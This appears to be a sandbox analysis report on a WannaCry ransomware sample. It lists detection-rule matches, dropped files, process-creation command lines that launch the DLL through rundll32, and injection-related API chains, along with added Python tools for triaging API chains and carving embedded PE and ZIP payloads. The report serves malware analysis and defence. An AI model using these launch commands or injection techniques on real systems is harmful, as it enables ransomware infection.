              Source: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 0000001D.00000000.347152674.000000000040E000.00000008.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 00000006.00000000.272335422.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 0000000B.00000000.278856067.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 00000004.00000000.263749691.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 00000006.00000002.357943271.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 00000004.00000000.265483719.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 00000004.00000000.267432086.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\WINDOWS\mssecsvc.exe
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B93CF0
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B928C8
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B93CC2
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B93C3D
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B93D36
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B93D1F
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B93D4B
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA3CF0
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA28C8
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA3CC2
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA4C9E
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA3D4B
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA3C3D
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA3D36
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA3D1F
Source: C:\Windows\mssecsvc.exe | Code function: 11_2_00A83CF0
Source: C:\Windows\mssecsvc.exe | Code function: 11_2_00A828C8
Source: C:\Windows\mssecsvc.exe | Code function: 11_2_00A83CC2
Source: C:\Windows\mssecsvc.exe | Code function: 11_2_00A83C3D
Source: C:\Windows\mssecsvc.exe | Code function: 11_2_00A83D36
Source: C:\Windows\mssecsvc.exe | Code function: 11_2_00A83D1F
Source: C:\Windows\mssecsvc.exe | Code function: 11_2_00A83D4B
Source: C:\Windows\tasksche.exe | Code function: 29_2_00406C40
Source: C:\Windows\tasksche.exe | Code function: 29_2_00402A76
Source: C:\Windows\tasksche.exe | Code function: 29_2_00402E7E
Source: C:\Windows\tasksche.exe | Code function: 29_2_0040350F
Source: C:\Windows\tasksche.exe | Code function: 29_2_00404C19
Source: C:\Windows\tasksche.exe | Code function: 29_2_0040541F
Source: C:\Windows\tasksche.exe | Code function: 29_2_00403797
Source: C:\Windows\tasksche.exe | Code function: 29_2_004043B7
Source: C:\Windows\tasksche.exe | Code function: 29_2_004031BC
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B905F2 FindCloseChangeNotification, GetModuleHandleA, NtCreateFile, NtOpenFile, NtCreateProcess, NtCreateProcessEx, NtCreateUserProcess, NtQueryInformationProcess, lstrcpyW, lstrcpyW, lstrcatW, NtMapViewOfSection, NtOpenProcessToken, FindCloseChangeNotification, CreateToolhelp32Snapshot, Process32First, Process32Next, OpenProcess, CreateRemoteThread, FindCloseChangeNotification, FindCloseChangeNotification
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B9042D GetModuleHandleA, GetVersion, VirtualAlloc, FindCloseChangeNotification, SetProcessAffinityMask, NtCreateFile, NtOpenFile, NtCreateProcess, NtCreateProcessEx, NtCreateUserProcess, NtQueryInformationProcess, lstrcpyW, lstrcpyW, lstrcatW, NtMapViewOfSection, NtOpenProcessToken, CreateToolhelp32Snapshot, Process32First, Process32Next, OpenProcess, CreateRemoteThread, FindCloseChangeNotification
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B9252F NtOpenSection
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B92574 NtMapViewOfSection, FindCloseChangeNotification, NtCreateFile, NtOpenFile, NtCreateProcess, NtCreateProcessEx, NtCreateUserProcess, NtQueryInformationProcess
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B92477 NtCreateFile, NtCreateFile, NtCreateFile, NtProtectVirtualMemory, NtWriteVirtualMemory
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B9144A LookupPrivilegeValueA, NtAdjustPrivilegesToken
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B924AE lstrcpyW, lstrlenW, NtCreateSection
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B933E0 NtOpenSection, NtQuerySystemInformation, MapViewOfFile, CloseHandle, UnmapViewOfFile
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B91422 LookupPrivilegeValueA, NtAdjustPrivilegesToken
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B93405 NtOpenSection, NtQuerySystemInformation, MapViewOfFile, CloseHandle, UnmapViewOfFile
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA33E0 NtOpenSection, NtQuerySystemInformation, MapViewOfFile, CloseHandle, UnmapViewOfFile
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA05F2 CloseHandle, GetModuleHandleA, NtCreateFile, NtOpenFile, NtCreateProcess, NtCreateProcessEx, NtCreateUserProcess, NtQueryInformationProcess, lstrcpyW, lstrcpyW, lstrcatW, NtMapViewOfSection, NtOpenProcessToken, CreateToolhelp32Snapshot, Process32First, Process32Next, OpenProcess, CreateRemoteThread, CloseHandle, CloseHandle
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA24AE lstrcpyW, lstrlenW, NtCreateSection
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA2477 NtCreateFile, NtCreateFile, NtCreateFile, NtProtectVirtualMemory, NtWriteVirtualMemory
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA2574 NtMapViewOfSection, CloseHandle, NtCreateFile, NtOpenFile, NtCreateProcess, NtCreateProcessEx, NtCreateUserProcess, NtQueryInformationProcess
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA144A LookupPrivilegeValueA, NtAdjustPrivilegesToken
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA252F NtOpenSection
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA042D GetModuleHandleA, GetVersion, VirtualAlloc, CloseHandle, SetProcessAffinityMask, NtCreateFile, NtOpenFile, NtCreateProcess, NtCreateProcessEx, NtCreateUserProcess, NtQueryInformationProcess, lstrcpyW, lstrcpyW, lstrcatW, NtMapViewOfSection, NtOpenProcessToken, CreateToolhelp32Snapshot, Process32First, Process32Next, OpenProcess, CreateRemoteThread, CloseHandle
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA1422 LookupPrivilegeValueA, NtAdjustPrivilegesToken
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA3405 NtOpenSection, NtQuerySystemInformation, MapViewOfFile, CloseHandle, UnmapViewOfFile
Source: C:\Windows\mssecsvc.exe | Code function: 11_2_00A805F2 CloseHandle, GetModuleHandleA, NtCreateFile, NtOpenFile, NtCreateProcess, NtCreateProcessEx, NtCreateUserProcess, NtQueryInformationProcess, lstrcpyW, lstrcpyW, lstrcatW, NtMapViewOfSection, NtOpenProcessToken, FindCloseChangeNotification, CreateToolhelp32Snapshot, Process32First, Process32Next, OpenProcess, CreateRemoteThread, CloseHandle, CloseHandle
Source: C:\Windows\mssecsvc.exe | Code function: 11_2_00A8252F NtOpenSection
Source: C:\Windows\mssecsvc.exe | Code function: 11_2_00A82574 NtMapViewOfSection, FindCloseChangeNotification, NtCreateFile, NtOpenFile, NtCreateProcess, NtCreateProcessEx, NtCreateUserProcess, NtQueryInformationProcess
Source: C:\Windows\mssecsvc.exe | Code function: 11_2_00A82477 NtCreateFile, NtCreateFile, NtCreateFile, NtProtectVirtualMemory, NtWriteVirtualMemory
Source: C:\Windows\mssecsvc.exe | Code function: 11_2_00A8144A LookupPrivilegeValueA, NtAdjustPrivilegesToken
Source: C:\Windows\mssecsvc.exe | Code function: 11_2_00A824AE lstrcpyW, lstrlenW, NtCreateSection
Source: C:\Windows\mssecsvc.exe | Code function: 11_2_00A833E0 NtOpenSection, NtQuerySystemInformation, MapViewOfFile, CloseHandle, UnmapViewOfFile
Source: C:\Windows\mssecsvc.exe | Code function: 11_2_00A8042D GetModuleHandleA, GetVersion, VirtualAlloc, CloseHandle, SetProcessAffinityMask, NtCreateFile, NtOpenFile, NtCreateProcess, NtCreateProcessEx, NtCreateUserProcess, NtQueryInformationProcess, lstrcpyW, lstrcpyW, lstrcatW, NtMapViewOfSection, NtOpenProcessToken, CreateToolhelp32Snapshot, Process32First, Process32Next, OpenProcess, CreateRemoteThread, CloseHandle
Source: C:\Windows\mssecsvc.exe | Code function: 11_2_00A81422 LookupPrivilegeValueA, NtAdjustPrivilegesToken
Source: C:\Windows\mssecsvc.exe | Code function: 11_2_00A83405 NtOpenSection, NtQuerySystemInformation, MapViewOfFile, CloseHandle, UnmapViewOfFile
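The function listing above gives, per function, the Win32 and Nt APIs the sandbox associates with it. The chain at 4_2_00B905F2 (CreateToolhelp32Snapshot, Process32First/Next, OpenProcess, CreateRemoteThread) is the textbook remote-thread injection sequence, 4_2_00B92477 pairs NtProtectVirtualMemory with NtWriteVirtualMemory, and 4_2_00B9144A adjusts token privileges. The same routines recur at three load bases (0x00B9xxxx, 0x7FEAxxxx in process 4, 0x00A8xxxx in process 11) and differ only in the high bytes of the address. The Python below is an added example, not code from the Joe Sandbox report: it parses lines of this shape (raw extraction form with the function id repeated, or the cleaned form), tags each function by the API set it contains, and collapses relocated copies by the low 16 bits of the address. The tag names and API sets in SIGNATURES are this example's own heuristics, and the sample lines are copied from the report.

```python
"""Triage Joe Sandbox "Code function" lines by the API chain they list.

Added example, not Joe Sandbox code. SIGNATURES is an assumed, hand-written
set of heuristics; a hit means the APIs are referenced by that function, which
is a lead for manual review rather than proof of the executed call order.
"""
import re
from collections import defaultdict

# A tag applies when every API in its set appears in the function's chain.
SIGNATURES = {
    "remote-thread-injection": {"CreateToolhelp32Snapshot", "OpenProcess",
                                "CreateRemoteThread"},
    "foreign-memory-write": {"NtProtectVirtualMemory", "NtWriteVirtualMemory"},
    "privilege-adjust": {"LookupPrivilegeValueA", "NtAdjustPrivilegesToken"},
    "section-create": {"NtCreateSection"},
    "native-process-create": {"NtCreateUserProcess"},
}

# Function ids look like <process index>_<phase>_<8 hex digit address>.
LINE_RE = re.compile(
    r"Code function:\s*(?P<fid>\d+_\d+_[0-9A-Fa-f]{8})\s*(?P<chain>.*)$")

# Constructed sample input: lines taken from the report above, the first one
# in the raw extraction form where the function id is repeated at the end.
SAMPLE_LINES = [
    r"Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B93CF04_2_00B93CF0",
    r"Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B905F2 FindCloseChangeNotification,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,FindCloseChangeNotification,FindCloseChangeNotification,4_2_00B905F2",
    r"Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B92477 NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory",
    r"Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B9144A LookupPrivilegeValueA,NtAdjustPrivilegesToken",
    r"Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B924AE lstrcpyW,lstrlenW,NtCreateSection",
    r"Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA05F2 CloseHandle,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,CloseHandle",
    r"Source: C:\Windows\mssecsvc.exe | Code function: 11_2_00A8144A LookupPrivilegeValueA,NtAdjustPrivilegesToken",
]


def parse_code_function_line(line):
    """Return (function id, [api, ...]) or None for a line of another kind.

    The trailing repeat of the function id produced by extraction is dropped
    from the chain, so raw and cleaned lines parse identically.
    """
    m = LINE_RE.search(line)
    if not m:
        return None
    fid = m.group("fid")
    apis = [t.strip() for t in m.group("chain").split(",")]
    return fid, [a for a in apis if a and a != fid]


def classify(apis):
    """Sorted tags whose API set is fully contained in the chain."""
    present = set(apis)
    return sorted(tag for tag, sig in SIGNATURES.items() if sig <= present)


def triage(lines):
    """Map function id -> tags, omitting functions that match nothing."""
    report = {}
    for line in lines:
        parsed = parse_code_function_line(line)
        if parsed is None:
            continue
        fid, apis = parsed
        tags = classify(apis)
        if tags:
            report[fid] = tags
    return report


def collapse_relocated(report):
    """Merge entries that differ only in load base: the same routine mapped
    at 0x00B905F2, 0x7FEA05F2 and 0x00A805F2 keeps the low 16 bits 05F2."""
    merged = defaultdict(set)
    for fid, tags in report.items():
        merged[fid[-4:].upper()].update(tags)
    return {offset: sorted(tags) for offset, tags in merged.items()}


if __name__ == "__main__":
    per_function = triage(SAMPLE_LINES)
    for fid, tags in sorted(per_function.items()):
        print(fid, ", ".join(tags))
    print("distinct routines:", collapse_relocated(per_function))
```

Running the block on the sample lines tags 4_2_00B905F2 and 4_2_7FEA05F2 identically, reports them once under offset 05F2, and leaves the bare 4_2_00B93CF0 entry untagged because the report lists no APIs for it.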
Source: mssecsvc.exe.2.dr | Static PE information: Resource name: R, type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: tasksche.exe.6.dr | Static PE information: Resource name: XIA, type: Zip archive data, at least v2.0 to extract
Source: C:\Windows\System32\svchost.exe | Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cdpsgshims.dll
Source: FjYNZSPNkt.dll | Virustotal: Detection: 86%
Source: FjYNZSPNkt.dll | Metadefender: Detection: 78%
Source: FjYNZSPNkt.dll | ReversingLabs: Detection: 96%
Source: FjYNZSPNkt.dll | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
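Two static facts above carry most of the weight: the dropped mssecsvc.exe stores a PE32 executable in a resource named R and the dropped tasksche.exe stores a Zip archive in a resource named XIA, and the submitted DLL's .text section carries IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE and IMAGE_SCN_MEM_READ (a code section that additionally had IMAGE_SCN_MEM_WRITE set is the "writeable .text section" condition named in the signature list). The Python below is an added example, not the report's or the sample's code: it parses the section table of a PE image in memory, names the characteristics flags the way the report prints them, lists code sections that are also writable, and carves embedded PE images and ZIP local headers by signature. The image it works on is constructed by build_pe, so every offset and flag is the example's own; the 0x40 lower bound on e_lfanew in carve_embedded is a heuristic assumption. Joe Sandbox reads the payloads by resource name; signature carving finds the same payloads without walking the resource tree, at the cost of not learning the resource name.

```python
"""Static PE checks: section characteristics and embedded payload carving.

Added example, not Joe Sandbox code. build_pe constructs a headers-only
PE32 for the demonstration; real samples carry the payload in the resource
directory, which the signature scan below locates without parsing resources.
"""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
FLAG_NAMES = [
    (IMAGE_SCN_CNT_CODE, "IMAGE_SCN_CNT_CODE"),
    (IMAGE_SCN_CNT_INITIALIZED_DATA, "IMAGE_SCN_CNT_INITIALIZED_DATA"),
    (IMAGE_SCN_MEM_EXECUTE, "IMAGE_SCN_MEM_EXECUTE"),
    (IMAGE_SCN_MEM_READ, "IMAGE_SCN_MEM_READ"),
    (IMAGE_SCN_MEM_WRITE, "IMAGE_SCN_MEM_WRITE"),
]
COFF_FMT = "<HHIIIHH"         # IMAGE_FILE_HEADER, 20 bytes
SECTION_FMT = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


def parse_sections(data):
    """DOS header -> PE signature -> COFF header -> section table.
    Returns [(section name, characteristics)]."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size
    sections = []
    for i in range(n_sections):
        fields = struct.unpack_from(SECTION_FMT, data, table + 40 * i)
        name = fields[0].rstrip(b"\0").decode("ascii", "replace")
        sections.append((name, fields[9]))
    return sections


def describe(characteristics):
    """Flag names for one section, in the order the report prints them."""
    return [name for bit, name in FLAG_NAMES if characteristics & bit]


def writable_code_sections(data):
    """Code sections that are also writable (self-modifying or packed code)."""
    return [name for name, chars in parse_sections(data)
            if chars & IMAGE_SCN_CNT_CODE and chars & IMAGE_SCN_MEM_WRITE]


def carve_embedded(data, start=1):
    """(kind, offset) for embedded PE images and ZIP local headers found
    after `start`; the default skips the outer file's own MZ header."""
    hits = []
    pos = data.find(b"MZ", start)
    while pos != -1:
        if pos + 0x40 <= len(data):
            lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            # Heuristic bounds (assumption): a 64-byte DOS header followed by
            # the PE signature within 4 KiB rules out most random "MZ" bytes.
            if 0x40 <= lfanew < 0x1000 and \
                    data[pos + lfanew:pos + lfanew + 4] == b"PE\0\0":
                hits.append(("pe", pos))
        pos = data.find(b"MZ", pos + 1)
    pos = data.find(b"PK\x03\x04", start)
    while pos != -1:
        hits.append(("zip", pos))
        pos = data.find(b"PK\x03\x04", pos + 1)
    return sorted(hits, key=lambda h: h[1])


def build_pe(sections, tail=b""):
    """Constructed input: a headers-only PE32 with the given
    [(name bytes, characteristics)] and an arbitrary blob appended."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 0x60   # optional header size; its contents are irrelevant here
    coff = struct.pack(COFF_FMT, 0x14C, len(sections), 0, 0, 0, opt_size, 0x2102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)   # PE32 magic
    table = b"".join(
        struct.pack(SECTION_FMT, name.ljust(8, b"\0"), 0x1000, 0x1000 * (i + 1),
                    0, 0, 0, 0, 0, 0, chars)
        for i, (name, chars) in enumerate(sections))
    return dos + b"PE\0\0" + coff + opt + table + tail


def build_sample():
    """Outer image with an RWX .text (the flagged condition) carrying an inner
    PE and a ZIP local-header stub, standing in for resources R and XIA."""
    rx = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
    inner = build_pe([(b".text", rx)])
    zip_stub = b"PK\x03\x04" + b"\0" * 26   # header only, not a full archive
    return build_pe([(b".text", rx | IMAGE_SCN_MEM_WRITE),
                     (b".rsrc", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ)],
                    tail=inner + zip_stub)


if __name__ == "__main__":
    image = build_sample()
    for name, chars in parse_sections(image):
        print(name, ", ".join(describe(chars)))
    print("writable code sections:", writable_code_sections(image))
    print("embedded payloads:", carve_embedded(image))
```

On the constructed image the outer .text reports all four flags and is listed as writable code, while the inner PE is found at offset 264 (right after the outer headers) and the ZIP stub at 488. Running the same functions over the real dropped files would print the flags the report shows for .text and the offsets of the R and XIA payloads.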
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll"
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\FjYNZSPNkt.dll,PlayGame
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll",PlayGame
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe
Source: unknown | Process created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe -m security
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
              Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\mssecsvc.exeProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\backgroundTaskHost.exe "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
              Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
              Source: C:\Windows\mssecsvc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
              Source: C:\Windows\System32\svchost.exe | File created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
              Source: classification engine | Classification label: mal100.rans.troj.evad.winDLL@30/53@2/3
              Source: C:\Windows\mssecsvc.exe | Code function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle, 4_2_00407C40
              Source: C:\Windows\tasksche.exe | Code function: OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,sprintf,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle, 29_2_00401CE8
              Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA, 4_2_00408090
              Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle, 4_2_00407C40
              Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B905F2 FindCloseChangeNotification,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,FindCloseChangeNotification,FindCloseChangeNotification, 4_2_00B905F2
              Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00407CE0 InternetCloseHandle,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,FindResourceA,LoadResource,LockResource,SizeofResource,sprintf,sprintf,sprintf,MoveFileExA,CreateFileA,WriteFile,CloseHandle,CreateProcessA,CloseHandle,CloseHandle, 4_2_00407CE0
